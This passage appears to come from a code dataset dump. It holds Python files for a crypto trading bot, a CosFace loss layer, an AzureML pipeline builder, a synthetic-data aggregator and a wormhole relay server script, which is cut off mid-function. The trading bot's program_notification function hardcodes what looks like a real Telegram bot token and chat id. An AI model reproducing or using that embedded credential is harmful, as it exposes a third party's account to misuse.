        # Bug fix: the message used to be interpolated, unencoded, into the
        # URL query string, so characters such as '&', '#' or newlines
        # corrupted or truncated the request. Sending the parameters as a
        # form payload lets requests encode them correctly.
        requests.post(url, data={"chat_id": chat_id, "text": message})
    except Exception as error:
        print(error)
def effective_yield_calculation(current_price, opening_price, fee):
    """Return the gross price ratio net of opening and closing fees.

    Computes ``R - (F + (1 - F) * R * F)`` where ``R`` is
    ``current_price / opening_price`` and ``F`` is the fee rate.
    """
    ratio = float(current_price) / float(opening_price)
    fee_rate = float(fee)
    closing_fee = (1 - fee_rate) * ratio * fee_rate
    return (ratio - (fee_rate + closing_fee))
def check_position():
    """
    Refresh the open position with the latest bid price, update the
    high/low watermarks, and close the position when the net yield hits
    either the stop-loss floor (Settings.risk) or the take-profit target
    (Settings.expected_yield).
    """
    Position.current_price = Settings.broker.price(Position.symbol)['bid']
    #Updating highest_price
    if Position.current_price >Position.highest_price:
        Position.highest_price=Position.current_price
    #Updating lowest_price
    if Position.current_price <Position.lowest_price:
        Position.lowest_price=Position.current_price
    #Calculating current effective_yield (price ratio net of fees)
    current_effective_yield = effective_yield_calculation(
        current_price=Position.current_price,
        opening_price=Position.open_price,
        fee=Settings.fee
    )
    #Stop loss
    #Close position :
    if current_effective_yield < Settings.risk:
        if Position.backtesting:
            # Simulate a fill exactly at the stop level.
            Position.close_price = Position.open_price*(Settings.risk)
        else:
            order = realcommands().limit_close(Position.symbol,backtesting=Position.backtesting)
            Position.close_price = float(order['price'])
        Position.close_mode = 'stoploss'
        Position.number_lost+=1
        close_position()
        return
    #Take profit on expected yield
    #Closing on takeprofit : Check if the yield is stronger than the minimal yield considering fees and slippage
    if current_effective_yield > Settings.expected_yield:
        if Position.backtesting:
            Position.close_price = Position.current_price
        else:
            order = realcommands().limit_close(symbol=Position.symbol,backtesting=Position.backtesting)
            Position.close_price = float(order['price'])
        Position.close_mode = 'takeprofit'
        close_position()
        return
def find_entry_point():
    """
    Scan the configured watchlist (one symbol per second) until a buy
    signal is produced and a position is opened.

    Returns the prediction dict for the opened position. Returns None if
    the loop finishes without a signal (the caller loops again).
    """
    #Analyse market every second
    #We use the watchlist defined in settings.py
    for symbol in Settings.watchlist:
        time.sleep(1)  # throttle broker/prediction requests
        try:
            #We analyze the market with the signals defined inside prediction.py
            predict = Prediction().buy_signal(symbol+'/'+Settings.base_asset)
            #We clear the console
            cls()
            for values in predict:
                print(values,':',predict[values],'\n')
            #Give information about the program
            statistics = {
                '':'------------------------------ :',
                'running_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.start_time,0))),
                'current_status':Position.status,
                'total_yield':str(round((Position.total_yield-1)*100,2))+' %',
                'position_number':Position.number,
                'position_lost':Position.number_lost,
            }
            for data, value in statistics.items():
                print(data, ':', value, '\n')
            #If we get a buy signal then :
            if predict['signal'] == 'buy' and open_position(
                symbol+'/'+Settings.base_asset
            ):
                # The prediction supplies the take-profit target for this trade.
                Settings.expected_yield = predict['recovery']
                return predict
        except Exception as error:
            # Keep scanning the rest of the watchlist on any failure.
            print('error while predicting : %s' % error)
def manage_position(predict):
    """
    One monitoring tick for an open position: redraw the console with the
    prediction and live statistics, then delegate exit decisions to
    check_position(). *predict* is the dict returned by find_entry_point().
    """
    #We clear the console
    cls()
    for values in predict:
        print(values,':',predict[values],'\n')
    current_effective_yield=effective_yield_calculation(Position.current_price,Position.open_price,Settings.fee)
    #Give information about the program
    statistics = {
        '':'------------------------------ :',
        'running_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.start_time,0))),
        'current_status':Position.status,
        'current_price':Position.current_price,
        'open_price':Position.open_price,
        'highest_price':Position.highest_price,
        'lowest_price':Position.lowest_price,
        'position_number':Position.number,
        'position_yield':str(round((current_effective_yield-1)*100,2))+' %',
        'total_yield':str(round((Position.total_yield*current_effective_yield-1)*100,2))+' %',
        'number_lost':Position.number_lost,
        'stoploss':Position.stoploss,
        'current_position_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.time,0))),
    }
    for data, value__ in statistics.items():
        print(data, ':', value__, '\n')
    try:
        #We check if we have to do something with the current position, update current price highest price and lowest price
        check_position()
    except Exception as e:
        # A transient broker error must not kill the monitoring loop.
        print(e)
    #We slow down the requests
    time.sleep(0.2)
def main():
    '''Brain: connect to the broker (or fall back to backtesting), then
    loop forever alternating between hunting for an entry point and
    managing the open position, until the drawdown limit is hit or the
    user interrupts with Ctrl-C.'''
    #Check the correct version of python
    if sys.version_info[0] < 3:
        raise Exception("Python 3 or a more recent version is required.")
    # Test broker commands and connectivity.
    if realcommands().test_connection():
        print("Connected to market")
    elif input("Unable to connect to market, run in backtesting mode? Y/N : ").upper()=='N':
        return
    else:
        Position.backtesting = True
    #Generates file with known supports
    csv_generator()
    # Send the current settings to the Telegram group as a description.
    parameters = vars(Settings)
    about = ''.join(
        '\n' + str(param) + ' : ' + str(value_)
        for param, value_ in parameters.items()
    )
    program_notification(about)
    # Record the program start time for uptime reporting.
    Position.start_time = time.time()
    print('---Starting Trading---')
    if Position.backtesting == True:
        program_notification("Démarrage du programme : "+Settings.program_name + " en mode démo \n"+Settings.commentaire)
    else:
        program_notification("Démarrage du programme : "+Settings.program_name + " en mode réél \n"+Settings.commentaire)
    while True:
        try:
            # Global drawdown guard: stop when total yield falls too far
            # below the best yield seen.
            if Position.highest_yield-Position.total_yield > Settings.program_risk:
                print("Program stopped : check strategy")
                break
            if Position.status == 'close':
                # NOTE(review): find_entry_point can return None and
                # ``predict`` is unbound on the very first 'open' tick if
                # status ever starts as 'open' -- confirm intended flow.
                predict = find_entry_point()
            elif Position.status == 'open':
                manage_position(predict)
        except KeyboardInterrupt:
            # Graceful shutdown: close any open position before exiting.
            cls()
            if Position.status == 'open':
                if Position.backtesting:
                    Position.close_price = Position.current_price
                else:
                    order = realcommands().limit_close(symbol=Position.symbol,backtesting=Position.backtesting)
                    Position.close_price = float(order['price'])
                Position.close_mode = 'stopping program'
                close_position()
            print("---Ending Trading--")
            break
    program_notification("Arrêt du programme : "+Settings.program_name)
# Script entry point.
if __name__=='__main__':
    main()
| 34.790625 | 223 | 0.633971 | import time,datetime,os,sys,requests
from brokerconnection import realcommands
from prediction import Prediction
from settings import Settings
from database import Database
from position import Position
from csv_generator import csv_generator
Position=Position()
Settings=Settings()
Database=Database()
def current_second() :
return datetime.datetime.now().second
def cls():
os.system('cls' if os.name=='nt' else 'clear')
def open_position(symbol):
if Position.backtesting == False:
order = realcommands().limit_open(symbol=symbol,backtesting=Position.backtesting)
if order['error']==True:
return False
Position.open_price=float(order['order']['price'])
current_price = Settings.broker.price(symbol)['ask']
else:
time.sleep(2)
current_price = Settings.broker.price(symbol)['ask']
Position.open_price = current_price
Position.symbol=symbol
Position.current_price =current_price
Position.highest_price=Position.open_price
Position.lowest_price=Position.open_price
Position.status='open'
Position.number+=1
Position.time=time.time()
return True
def close_position():
Position.status='close'
Position.stoploss = False
Position.effective_yield = effective_yield_calculation(Position.close_price,Position.open_price,Settings.fee)
Position.total_yield = round(Position.total_yield*Position.effective_yield,5)
if Position.total_yield > Position.highest_yield:
Position.highest_yield = Position.total_yield
save_position()
return
def save_position():
try:
date = time.time()
text=''
text+="\nRendement : "+str(round((Position.total_yield-1)*100,2))+' %'
program_notification(message=text)
Database.database_request(
sql=("""REPLACE INTO positions (paire,opening_date,closing_date,duration,opening_price,closing_price,exit_way,highest_price,lowest_price,position_yield,total_yield) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"""),
params=(
Position.symbol,
datetime.datetime.fromtimestamp(Position.time),
datetime.datetime.fromtimestamp(date),
str(datetime.timedelta(seconds=round(date,0)-round(Position.time,0))),
Position.open_price,
Position.close_price,
Position.close_mode,
Position.highest_price,
Position.lowest_price,
Position.effective_yield,
Position.total_yield,
),
commit=True
)
return
except Exception as error:
program_notification(message=error)
def program_notification(message):
try:
token = "1813447727:AAHDPI54DetjXDDNFCMqtN-7phGvwNy9rqY"
chat_id = "-431364858"
url = f"https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text={message}"
requests.post(url)
except Exception as error:
print(error)
def effective_yield_calculation(current_price,opening_price,fee):
R = float(current_price)/float(opening_price)
F = float(fee)
return (R-(F+(1-F)*R*F))
def check_position():
Position.current_price = Settings.broker.price(Position.symbol)['bid']
if Position.current_price >Position.highest_price:
Position.highest_price=Position.current_price
if Position.current_price <Position.lowest_price:
Position.lowest_price=Position.current_price
current_effective_yield = effective_yield_calculation(
current_price=Position.current_price,
opening_price=Position.open_price,
fee=Settings.fee
)
if current_effective_yield < Settings.risk:
if Position.backtesting:
Position.close_price = Position.open_price*(Settings.risk)
else:
order = realcommands().limit_close(Position.symbol,backtesting=Position.backtesting)
Position.close_price = float(order['price'])
Position.close_mode = 'stoploss'
Position.number_lost+=1
close_position()
return
if current_effective_yield > Settings.expected_yield:
if Position.backtesting:
Position.close_price = Position.current_price
else:
order = realcommands().limit_close(symbol=Position.symbol,backtesting=Position.backtesting)
Position.close_price = float(order['price'])
Position.close_mode = 'takeprofit'
close_position()
return
def find_entry_point():
for symbol in Settings.watchlist:
time.sleep(1)
try:
predict = Prediction().buy_signal(symbol+'/'+Settings.base_asset)
cls()
for values in predict:
print(values,':',predict[values],'\n')
statistics = {
'':'------------------------------ :',
'running_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.start_time,0))),
'current_status':Position.status,
'total_yield':str(round((Position.total_yield-1)*100,2))+' %',
'position_number':Position.number,
'position_lost':Position.number_lost,
}
for data, value in statistics.items():
print(data, ':', value, '\n')
if predict['signal'] == 'buy' and open_position(
symbol+'/'+Settings.base_asset
):
Settings.expected_yield = predict['recovery']
return predict
except Exception as error:
print('error while predicting : %s' % error)
def manage_position(predict):
cls()
for values in predict:
print(values,':',predict[values],'\n')
current_effective_yield=effective_yield_calculation(Position.current_price,Position.open_price,Settings.fee)
statistics = {
'':'------------------------------ :',
'running_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.start_time,0))),
'current_status':Position.status,
'current_price':Position.current_price,
'open_price':Position.open_price,
'highest_price':Position.highest_price,
'lowest_price':Position.lowest_price,
'position_number':Position.number,
'position_yield':str(round((current_effective_yield-1)*100,2))+' %',
'total_yield':str(round((Position.total_yield*current_effective_yield-1)*100,2))+' %',
'number_lost':Position.number_lost,
'stoploss':Position.stoploss,
'current_position_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.time,0))),
}
for data, value__ in statistics.items():
print(data, ':', value__, '\n')
try:
check_position()
except Exception as e:
print(e)
time.sleep(0.2)
def main():
if sys.version_info[0] < 3:
raise Exception("Python 3 or a more recent version is required.")
if realcommands().test_connection():
print("Connected to market")
elif input("Unable to connect to market, run in backtesting mode? Y/N : ").upper()=='N':
return
else:
Position.backtesting = True
csv_generator()
parameters = vars(Settings)
about = ''.join(
'\n' + str(param) + ' : ' + str(value_)
for param, value_ in parameters.items()
)
program_notification(about)
Position.start_time = time.time()
print('---Starting Trading---')
if Position.backtesting == True:
program_notification("Démarrage du programme : "+Settings.program_name + " en mode démo \n"+Settings.commentaire)
else:
program_notification("Démarrage du programme : "+Settings.program_name + " en mode réél \n"+Settings.commentaire)
while True:
try:
if Position.highest_yield-Position.total_yield > Settings.program_risk:
print("Program stopped : check strategy")
break
if Position.status == 'close':
predict = find_entry_point()
elif Position.status == 'open':
manage_position(predict)
except KeyboardInterrupt:
cls()
if Position.status == 'open':
if Position.backtesting:
Position.close_price = Position.current_price
else:
order = realcommands().limit_close(symbol=Position.symbol,backtesting=Position.backtesting)
Position.close_price = float(order['price'])
Position.close_mode = 'stopping program'
close_position()
print("---Ending Trading--")
break
program_notification("Arrêt du programme : "+Settings.program_name)
if __name__=='__main__':
main()
| true | true |
f73291c826cb60dbd0831bf1e0263014829f7443 | 1,399 | py | Python | fastreid/layers/cos_softmax.py | tycallen/fast-reid | 66683fa95bc7d7222659e8db3ac04e5b8e366190 | [
"Apache-2.0"
] | 19 | 2021-09-10T02:16:29.000Z | 2022-03-27T12:47:46.000Z | fastreid/layers/cos_softmax.py | tycallen/fast-reid | 66683fa95bc7d7222659e8db3ac04e5b8e366190 | [
"Apache-2.0"
] | 5 | 2021-09-27T03:52:12.000Z | 2021-12-29T09:13:40.000Z | fastreid/layers/cos_softmax.py | tycallen/fast-reid | 66683fa95bc7d7222659e8db3ac04e5b8e366190 | [
"Apache-2.0"
] | 3 | 2021-12-23T16:44:44.000Z | 2022-03-27T12:47:47.000Z | # encoding: utf-8
"""
@author: xingyu liao
@contact: sherlockliao01@gmail.com
"""
import torch
from torch import nn
import torch.nn.functional as F
from torch.nn import Parameter
class CosSoftmax(nn.Module):
    r"""Implement of large margin cosine distance (CosFace-style head).

    Args:
        cfg: config node providing ``MODEL.HEADS.SCALE`` and
            ``MODEL.HEADS.MARGIN``
        in_feat: size of each input sample
        num_classes: size of each output sample
    """

    def __init__(self, cfg, in_feat, num_classes):
        super().__init__()
        self.in_features = in_feat
        self._num_classes = num_classes
        self.s = cfg.MODEL.HEADS.SCALE
        self.m = cfg.MODEL.HEADS.MARGIN
        self.weight = Parameter(torch.Tensor(num_classes, in_feat))
        nn.init.xavier_uniform_(self.weight)

    def forward(self, features, targets):
        # --------------------------- cos(theta) & phi(theta) ---------------------------
        # Cosine similarity between L2-normalized features and class weights.
        cosine = F.linear(F.normalize(features), F.normalize(self.weight))
        # Additive cosine margin applied to the target-class logit.
        phi = cosine - self.m
        # --------------------------- convert label to one-hot ---------------------------
        targets = F.one_hot(targets, num_classes=self._num_classes)
        output = (targets * phi) + ((1.0 - targets) * cosine)
        output *= self.s  # scale logits before softmax/cross-entropy
        return output

    def extra_repr(self):
        # Bug fix: the attribute is ``in_features``; the previous
        # ``self.in_feat`` did not exist, so repr()/print() of the module
        # raised AttributeError.
        return 'in_features={}, num_classes={}, scale={}, margin={}'.format(
            self.in_features, self._num_classes, self.s, self.m
        )
| 31.795455 | 90 | 0.584703 |
import torch
from torch import nn
import torch.nn.functional as F
from torch.nn import Parameter
class CosSoftmax(nn.Module):
def __init__(self, cfg, in_feat, num_classes):
super().__init__()
self.in_features = in_feat
self._num_classes = num_classes
self.s = cfg.MODEL.HEADS.SCALE
self.m = cfg.MODEL.HEADS.MARGIN
self.weight = Parameter(torch.Tensor(num_classes, in_feat))
nn.init.xavier_uniform_(self.weight)
def forward(self, features, targets):
cosine = F.linear(F.normalize(features), F.normalize(self.weight))
phi = cosine - self.m
targets = F.one_hot(targets, num_classes=self._num_classes)
output = (targets * phi) + ((1.0 - targets) * cosine)
output *= self.s
return output
def extra_repr(self):
return 'in_features={}, num_classes={}, scale={}, margin={}'.format(
self.in_feat, self._num_classes, self.s, self.m
)
| true | true |
f732945508b4f5b0ce0dabe10f16e4ac669fd278 | 92 | py | Python | myapp/app.py | cwg83/cgoodale.com-flask | 50a18585e8d0e2ae31bfb12ed552e1c5089094c2 | [
"CC0-1.0"
] | null | null | null | myapp/app.py | cwg83/cgoodale.com-flask | 50a18585e8d0e2ae31bfb12ed552e1c5089094c2 | [
"CC0-1.0"
] | null | null | null | myapp/app.py | cwg83/cgoodale.com-flask | 50a18585e8d0e2ae31bfb12ed552e1c5089094c2 | [
"CC0-1.0"
] | null | null | null | from calblog import app
# Run the Flask development server when executed directly.
# NOTE(review): debug=True enables the interactive debugger -- do not use
# in production.
if __name__ == '__main__':
    app.run(port=34630, debug=True)
| 10.222222 | 35 | 0.673913 | from calblog import app
if __name__ == '__main__':
app.run(port=34630, debug=True)
| true | true |
f73294872a3d8143e1add44fe880ba57f1fac308 | 2,252 | py | Python | mlapp/integrations/aml/scripts/publish_multisteps_pipeline.py | nbk905/mlapp | af650a8a302959674dd5a1bc6d15e30e90abf227 | [
"Apache-2.0"
] | null | null | null | mlapp/integrations/aml/scripts/publish_multisteps_pipeline.py | nbk905/mlapp | af650a8a302959674dd5a1bc6d15e30e90abf227 | [
"Apache-2.0"
] | null | null | null | mlapp/integrations/aml/scripts/publish_multisteps_pipeline.py | nbk905/mlapp | af650a8a302959674dd5a1bc6d15e30e90abf227 | [
"Apache-2.0"
] | null | null | null | from azureml.data.data_reference import DataReference
from azureml.pipeline.core import PipelineData
from mlapp.integrations.aml.utils.compute import get_or_create_compute_target
from mlapp.integrations.aml.utils.constants import OUTPUT_PATH_ON_COMPUTE, DATA_REFERENCE_NAME
from mlapp.integrations.aml.utils.pipeline import publish_pipeline_endpoint, create_mlapp_pipeline_step
from mlapp.integrations.aml.utils.runconfig import create_runconfig
import os
def run_script(ws, env, datastore, pipeline_name, instructions):
    """
    Build one AzureML pipeline step per entry in *instructions* (each entry
    describes a compute target), chain each step's output into the next
    step's input, and publish the resulting pipeline as *pipeline_name*.
    """
    pipeline_steps = []
    last_output = []  # PipelineData outputs accumulated across steps
    for i in range(len(instructions)):
        compute_target = get_or_create_compute_target(
            ws,
            compute_name=instructions[i]['name'],
            vm_size=instructions[i].get('vm_size', 'STANDARD_D2_V2'),
            min_nodes=instructions[i].get('min_nodes', 0),
            max_nodes=instructions[i].get('max_nodes', 4),
            idle_sec=instructions[i].get('idle_seconds_before_scale_down', 120)
        )
        run_config = create_runconfig(compute_target, env)
        # input directory in datastore
        if len(last_output) == 0:
            input_dir = None
            # input_dir = DataReference(
            #     datastore=datastore,
            #     data_reference_name=DATA_REFERENCE_NAME + str(i),
            #     path_on_datastore="flows/",
            #     mode='download'
            # )
        else:
            # NOTE(review): this passes the whole list of ALL previous
            # outputs, not just the immediately preceding one -- confirm
            # that is intended rather than last_output[-1].
            input_dir = last_output
        # output directory in datastore
        output_dir = PipelineData(
            name=DATA_REFERENCE_NAME + str(i),
            datastore=datastore,
            output_path_on_compute=OUTPUT_PATH_ON_COMPUTE
        )
        # create pipeline step
        pipeline_step = create_mlapp_pipeline_step(
            compute_target, run_config,
            source_directory=os.getcwd(),
            entry_script=os.path.join("deployment", "aml_flow.py"),
            input_dir=input_dir,
            output_dir=output_dir,
            param_name='config' + str(i)
        )
        # add to pipeline
        pipeline_steps += pipeline_step
        # reference last output
        last_output.append(output_dir)
    publish_pipeline_endpoint(ws, pipeline_steps, pipeline_name)
| 35.1875 | 103 | 0.654085 | from azureml.data.data_reference import DataReference
from azureml.pipeline.core import PipelineData
from mlapp.integrations.aml.utils.compute import get_or_create_compute_target
from mlapp.integrations.aml.utils.constants import OUTPUT_PATH_ON_COMPUTE, DATA_REFERENCE_NAME
from mlapp.integrations.aml.utils.pipeline import publish_pipeline_endpoint, create_mlapp_pipeline_step
from mlapp.integrations.aml.utils.runconfig import create_runconfig
import os
def run_script(ws, env, datastore, pipeline_name, instructions):
pipeline_steps = []
last_output = []
for i in range(len(instructions)):
compute_target = get_or_create_compute_target(
ws,
compute_name=instructions[i]['name'],
vm_size=instructions[i].get('vm_size', 'STANDARD_D2_V2'),
min_nodes=instructions[i].get('min_nodes', 0),
max_nodes=instructions[i].get('max_nodes', 4),
idle_sec=instructions[i].get('idle_seconds_before_scale_down', 120)
)
run_config = create_runconfig(compute_target, env)
if len(last_output) == 0:
input_dir = None
else:
input_dir = last_output
output_dir = PipelineData(
name=DATA_REFERENCE_NAME + str(i),
datastore=datastore,
output_path_on_compute=OUTPUT_PATH_ON_COMPUTE
)
pipeline_step = create_mlapp_pipeline_step(
compute_target, run_config,
source_directory=os.getcwd(),
entry_script=os.path.join("deployment", "aml_flow.py"),
input_dir=input_dir,
output_dir=output_dir,
param_name='config' + str(i)
)
pipeline_steps += pipeline_step
last_output.append(output_dir)
publish_pipeline_endpoint(ws, pipeline_steps, pipeline_name)
| true | true |
f732951c2a10f606835e6edf4dd28492d430def9 | 4,455 | py | Python | aggregator.py | lorrainewongmw/synthetic-data-showcase | c686478e5b58e3a2bc0e3bdd6d6f5c7a8378ff5d | [
"MIT"
] | null | null | null | aggregator.py | lorrainewongmw/synthetic-data-showcase | c686478e5b58e3a2bc0e3bdd6d6f5c7a8378ff5d | [
"MIT"
] | null | null | null | aggregator.py | lorrainewongmw/synthetic-data-showcase | c686478e5b58e3a2bc0e3bdd6d6f5c7a8378ff5d | [
"MIT"
] | null | null | null | import time
import datetime
import logging
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from os import path
import util as util
def aggregate(config):
    """Aggregates the sensitive microdata at sensitive_microdata_path.

    Produces the reportable_aggregates tsv file of aggregate counts rounded down to the closest resolution,
    the sensitive_aggregates tsv file of actual aggregate counts, and the
    sensitive_rare_by_length tsv and svg files of rare combinations by length.

    This stage only needs to be run once for a given sensitive dataset and reporting limit/resolution.

    Args:
        config: options from the json config file, else default values.
    """
    use_columns = config['use_columns']
    reporting_length = config['reporting_length']
    reporting_resolution = config['reporting_resolution']
    parallel_jobs = config['parallel_jobs']
    record_limit = config['record_limit']
    sensitive_microdata_path = config['sensitive_microdata_path']
    sensitive_microdata_delimiter = config['sensitive_microdata_delimiter']
    reportable_aggregates_path = config['reportable_aggregates_path']
    sensitive_aggregates_path = config['sensitive_aggregates_path']
    sensitive_zeros = config['sensitive_zeros']
    output_dir = config['output_dir']
    prefix = config['prefix']

    logging.info(f'Aggregate {sensitive_microdata_path}')
    start_time = time.time()
    df = util.loadMicrodata(path=sensitive_microdata_path, delimiter=sensitive_microdata_delimiter, record_limit=record_limit, use_columns=use_columns)
    row_list = util.genRowList(df=df, sensitive_zeros=sensitive_zeros)
    # reporting_length == -1 means "use the longest row in the data".
    if reporting_length == -1:
        reporting_length = max([len(row) for row in row_list])
    if use_columns != []:
        reporting_length = min(reporting_length, len(use_columns))
    length_to_combo_to_count = util.countAllCombos(row_list=row_list, length_limit=reporting_length, parallel_jobs=parallel_jobs)
    # Per-length totals and counts of "rare" combos (below the resolution).
    len_to_combo_count = {length: len(combo_to_count) for length, combo_to_count in length_to_combo_to_count.items()}
    len_to_rare_count = {length: len([1 for combo, count in combo_to_count.items() if count < reporting_resolution]) for length, combo_to_count in length_to_combo_to_count.items()}
    leakage_tsv = path.join(output_dir, f'{prefix}_sensitive_rare_by_length.tsv')
    leakage_svg = path.join(output_dir, f'{prefix}_sensitive_rare_by_length.svg')
    with open(leakage_tsv, 'w') as f:
        f.write('\t'.join(['sen_combo_length', 'combo_count', 'rare_count', 'rare_proportion'])+'\n')
        for length, combo_count in len_to_combo_count.items():
            rare_count = len_to_rare_count.get(length, 0)
            rare_prop = rare_count / combo_count
            f.write('\t'.join([str(length), str(combo_count), str(rare_count), str(rare_prop)])+'\n')

    util.plotStats(
        x_axis='sen_combo_length',
        x_axis_title='Length of Sensitive Combination',
        y_bar='combo_count',
        y_bar_title='Count of Combinations',
        y_line='rare_proportion',
        y_line_title=f'Proportion of Rare (<{reporting_resolution}) Combinations',
        color='violet',
        darker_color='darkviolet',
        stats_tsv=leakage_tsv,
        stats_svg=leakage_svg,
        delimiter='\t',
        style='whitegrid',
        palette='magma')

    with open(reportable_aggregates_path, 'w') as ra:
        with open(sensitive_aggregates_path, 'w') as sa:
            # First data row of each file is the overall record count.
            sa.write('\t'.join(['selections', 'count'])+'\n')
            sa.write('\t'.join(['', str(len(df))])+'\n')
            ra.write('\t'.join(['selections', 'protected_count'])+'\n')
            # NOTE(review): this total row labels its selections column with
            # the literal 'selections', whereas the sensitive file uses '' --
            # confirm whether the mismatch is intentional.
            ra.write('\t'.join(['selections', str(util.protect(len(df), reporting_resolution))])+'\n')
            for _, combo_to_count in length_to_combo_to_count.items():
                for combo, count in combo_to_count.items():
                    selections_string = util.comboToString(combo)
                    # Counts are rounded down to the reporting resolution;
                    # combos that round to zero are omitted from the
                    # reportable file.
                    protected_count = util.protect(count, reporting_resolution)
                    sa.write('\t'.join([str(selections_string), str(count)])+'\n')
                    if protected_count > 0:
                        ra.write('\t'.join([str(selections_string), str(protected_count)])+'\n')
    
    logging.info(f'Aggregated {sensitive_microdata_path} into {reportable_aggregates_path}, took {datetime.timedelta(seconds = time.time() - start_time)}s')
| 47.903226 | 180 | 0.700561 | import time
import datetime
import logging
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from os import path
import util as util
def aggregate(config):
use_columns = config['use_columns']
reporting_length = config['reporting_length']
reporting_resolution = config['reporting_resolution']
parallel_jobs = config['parallel_jobs']
record_limit = config['record_limit']
sensitive_microdata_path = config['sensitive_microdata_path']
sensitive_microdata_delimiter = config['sensitive_microdata_delimiter']
reportable_aggregates_path = config['reportable_aggregates_path']
sensitive_aggregates_path = config['sensitive_aggregates_path']
sensitive_zeros = config['sensitive_zeros']
output_dir = config['output_dir']
prefix = config['prefix']
logging.info(f'Aggregate {sensitive_microdata_path}')
start_time = time.time()
df = util.loadMicrodata(path=sensitive_microdata_path, delimiter=sensitive_microdata_delimiter, record_limit=record_limit, use_columns=use_columns)
row_list = util.genRowList(df=df, sensitive_zeros=sensitive_zeros)
if reporting_length == -1:
reporting_length = max([len(row) for row in row_list])
if use_columns != []:
reporting_length = min(reporting_length, len(use_columns))
length_to_combo_to_count = util.countAllCombos(row_list=row_list, length_limit=reporting_length, parallel_jobs=parallel_jobs)
len_to_combo_count = {length: len(combo_to_count) for length, combo_to_count in length_to_combo_to_count.items()}
len_to_rare_count = {length: len([1 for combo, count in combo_to_count.items() if count < reporting_resolution]) for length, combo_to_count in length_to_combo_to_count.items()}
leakage_tsv = path.join(output_dir, f'{prefix}_sensitive_rare_by_length.tsv')
leakage_svg = path.join(output_dir, f'{prefix}_sensitive_rare_by_length.svg')
with open(leakage_tsv, 'w') as f:
f.write('\t'.join(['sen_combo_length', 'combo_count', 'rare_count', 'rare_proportion'])+'\n')
for length, combo_count in len_to_combo_count.items():
rare_count = len_to_rare_count.get(length, 0)
rare_prop = rare_count / combo_count
f.write('\t'.join([str(length), str(combo_count), str(rare_count), str(rare_prop)])+'\n')
util.plotStats(
x_axis='sen_combo_length',
x_axis_title='Length of Sensitive Combination',
y_bar='combo_count',
y_bar_title='Count of Combinations',
y_line='rare_proportion',
y_line_title=f'Proportion of Rare (<{reporting_resolution}) Combinations',
color='violet',
darker_color='darkviolet',
stats_tsv=leakage_tsv,
stats_svg=leakage_svg,
delimiter='\t',
style='whitegrid',
palette='magma')
with open(reportable_aggregates_path, 'w') as ra:
with open(sensitive_aggregates_path, 'w') as sa:
sa.write('\t'.join(['selections', 'count'])+'\n')
sa.write('\t'.join(['', str(len(df))])+'\n')
ra.write('\t'.join(['selections', 'protected_count'])+'\n')
ra.write('\t'.join(['selections', str(util.protect(len(df), reporting_resolution))])+'\n')
for _, combo_to_count in length_to_combo_to_count.items():
for combo, count in combo_to_count.items():
selections_string = util.comboToString(combo)
protected_count = util.protect(count, reporting_resolution)
sa.write('\t'.join([str(selections_string), str(count)])+'\n')
if protected_count > 0:
ra.write('\t'.join([str(selections_string), str(protected_count)])+'\n')
logging.info(f'Aggregated {sensitive_microdata_path} into {reportable_aggregates_path}, took {datetime.timedelta(seconds = time.time() - start_time)}s')
| true | true |
f73295e0bdf841a082ee62af3dfeefbf417d5f78 | 2,131 | py | Python | src/wormhole/server/cmd_server.py | LeastAuthority/magic-wormhole | 2fadadc4dba78f167cfc1295bbea7ee778d22dd5 | [
"MIT"
] | null | null | null | src/wormhole/server/cmd_server.py | LeastAuthority/magic-wormhole | 2fadadc4dba78f167cfc1295bbea7ee778d22dd5 | [
"MIT"
] | null | null | null | src/wormhole/server/cmd_server.py | LeastAuthority/magic-wormhole | 2fadadc4dba78f167cfc1295bbea7ee778d22dd5 | [
"MIT"
] | null | null | null | from __future__ import print_function, unicode_literals
import os, time
from twisted.python import usage
from twisted.scripts import twistd
class MyPlugin(object):
    # twistd service-maker plugin that constructs the relay server service.
    tapname = "xyznode"

    def __init__(self, args):
        # args: parsed command-line options (rendezvous URL, database
        # path, usage blurring, stats file, ...).
        self.args = args

    def makeService(self, so):
        # delay this import as late as possible, to allow twistd's code to
        # accept --reactor= selection
        from .server import RelayServer
        return RelayServer(
            str(self.args.rendezvous),
            self.args.advertise_version,
            self.args.relay_database_path,
            self.args.blur_usage,
            signal_error=self.args.signal_error,
            stats_file=self.args.stats_json_path,
            allow_list=self.args.allow_list,
        )
class MyTwistdConfig(twistd.ServerOptions):
    # Register one dummy "XYZ" subcommand so twistd's option parser accepts
    # our invocation; the actual service is injected via loadedPlugins.
    subCommands = [("XYZ", None, usage.Options, "node")]
def start_server(args):
    """Run the relay server under twistd; daemonizes unless --no-daemon."""
    config = MyTwistdConfig()
    twistd_argv = (["--nodaemon"] if args.no_daemon else []) + ["XYZ"]
    config.parseOptions(tuple(twistd_argv))
    config.loadedPlugins = {"XYZ": MyPlugin(args)}
    print("starting wormhole relay server")
    # twistd.runApp forks; the parent process exits via os._exit(0) and
    # never returns from this call.
    twistd.runApp(config)
def kill_server():
    """Send SIGTERM to the twistd daemon recorded in ./twistd.pid.

    Prints a notice and returns quietly when the pid file is missing
    (i.e. the current directory is not a server directory). A pid file
    containing non-numeric garbage still raises ValueError, as before.
    """
    try:
        f = open("twistd.pid", "r")
    except EnvironmentError:
        print("Unable to find twistd.pid: is this really a server directory?")
        print("oh well, ignoring 'stop'")
        return
    # 'with' guarantees the descriptor is closed even when int() raises on
    # garbage content; the original leaked the open handle on that path.
    with f:
        pid = int(f.read().strip())
    os.kill(pid, 15)
    print("server process %d sent SIGTERM" % pid)
    return
def stop_server(args):
    """CLI entry point for 'stop': terminate the running daemon."""
    return kill_server()
def restart_server(args):
    """Stop the running daemon, wait for it to exit, then start a new one.

    Returns 1 when the old server's pid file is still present after
    roughly ten seconds of polling.
    """
    kill_server()
    time.sleep(0.1)
    for attempt in range(10):
        if not os.path.exists("twistd.pid"):
            break
        if attempt == 0:
            print(" waiting for shutdown..")
        time.sleep(1)
    if os.path.exists("twistd.pid"):
